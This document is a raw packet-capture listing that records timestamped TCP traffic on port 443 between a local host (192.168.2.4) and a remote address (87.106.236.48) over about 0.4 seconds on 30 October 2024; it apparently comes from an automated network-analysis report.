                                                                                              Oct 30, 2024 19:47:18.464133978 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.464165926 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.464173079 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.464188099 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.464211941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.465038061 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.465055943 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.465087891 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.465095997 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.465109110 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.465131998 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.465607882 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.465629101 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.465660095 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.465667009 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.465676069 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.465706110 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.466054916 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.466075897 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.466105938 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.466113091 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.466135979 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.466144085 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.466964960 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.466984034 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.467015982 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.467020988 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.467035055 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.467061043 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.467837095 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.467858076 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.467888117 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.467894077 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.467905998 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.467935085 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.468497038 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.468518019 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.468548059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.468553066 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.468563080 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.468581915 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.468589067 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.468596935 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.468620062 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.468632936 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.468640089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.468667030 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.468686104 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.469520092 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.469540119 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.469571114 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.469578028 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.469588041 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.469613075 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.470293045 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.470312119 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.470344067 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.470349073 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.470360041 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.470382929 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.505073071 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.505095959 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.505155087 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.505167007 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.505178928 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.505197048 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.548002005 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.548026085 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.548214912 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.548226118 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.548271894 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.585557938 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.585608959 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.585756063 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.585757017 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.585766077 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.585812092 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.586708069 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.586725950 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.586806059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.586812973 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.586858988 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.587213039 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.587227106 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.587287903 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.587295055 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.587340117 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.587737083 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.587752104 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.587801933 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.587807894 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.587842941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.588495016 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.588509083 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.588565111 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.588572025 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.588617086 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.589296103 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.589310884 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.589378119 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.589385986 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.589428902 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.590003967 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.590019941 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.590070963 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.590076923 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.590104103 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.590116024 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.590125084 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.590133905 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.590156078 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.590194941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.590866089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.590909004 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.590923071 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.590929031 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.590955973 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.590971947 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.591749907 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.591764927 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.591815948 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.591823101 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.591861963 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.592631102 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.592647076 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.592701912 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.592709064 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.592741966 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.592749119 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.592756033 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.592786074 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.592787981 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.592818022 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.592823029 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.592849970 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.592875957 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.593595028 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.593610048 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.593667030 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.593674898 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.593729019 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.593780994 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.593837023 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.594099045 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.594152927 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.628242016 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.628263950 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.628467083 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.628495932 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.628542900 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.629762888 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.629776955 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.629832029 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.629841089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.629875898 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.708821058 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.708841085 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.708913088 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.708913088 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.708941936 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.709002018 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.709335089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.709350109 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.709393024 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.709403992 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.709425926 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.709454060 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.709882975 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.709897041 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.709950924 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.709958076 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.710000038 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.710382938 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.710397959 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.710448027 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.710453987 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.710464001 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.710490942 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.711010933 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.711025000 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.711070061 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.711076975 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.711091042 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.711112976 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.711863041 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.711879969 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.711926937 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.711935043 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.711946011 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.711971998 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.712265968 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.712281942 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.712337017 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.712344885 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.712380886 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.712892056 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.712904930 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.712956905 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.712965965 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.713004112 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.713372946 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.713388920 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.713448048 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.713454008 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.713493109 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.714062929 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.714076996 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.714131117 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.714138985 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.714175940 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.714644909 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.714662075 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.714703083 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.714709997 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.714721918 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.714746952 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.715002060 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.715018034 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.715070009 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.715078115 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.715115070 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.715951920 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.715965986 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.716022968 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.716031075 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.716063023 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.716427088 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.716440916 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.716480017 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.716486931 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.716500044 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.716525078 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.716900110 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.716914892 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.716960907 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.716968060 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.716985941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.717009068 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.751965046 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.751981020 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.752026081 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.752036095 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.752046108 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.752074003 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.794853926 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.794869900 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.794910908 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.794926882 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.794956923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.794956923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.832257986 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.832277060 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.832325935 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.832339048 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.832376003 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.832834005 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.832848072 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.832884073 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.832890034 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.832916975 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.832933903 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.833340883 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.833353996 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.833385944 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.833393097 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.833416939 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.833430052 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.833980083 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.833993912 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.834028959 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.834033966 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.834054947 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.834074974 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.834353924 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.834367037 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.834400892 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.834407091 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.834430933 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.834449053 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.835026979 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.835038900 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.835087061 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.835093975 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.835134983 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.835628033 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.835644007 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.835680962 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.835686922 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.835700035 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.835724115 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.836246967 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.836261988 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.836308002 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.836316109 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.836354971 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.836764097 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.836780071 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.836817026 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.836826086 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.836855888 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.836873055 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.837208986 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.837228060 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.837260962 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.837268114 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.837294102 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.837311029 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.837641954 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.837655067 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.837712049 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.837718964 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.837740898 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.837759018 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.838179111 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.838195086 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.838229895 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.838238001 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.838268995 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.838283062 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.838303089 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.838308096 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.838320017 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.838334084 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.838372946 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.840087891 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.840101957 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.840159893 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:18.840167046 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:18.840184927 CET49731443192.168.2.487.106.236.48
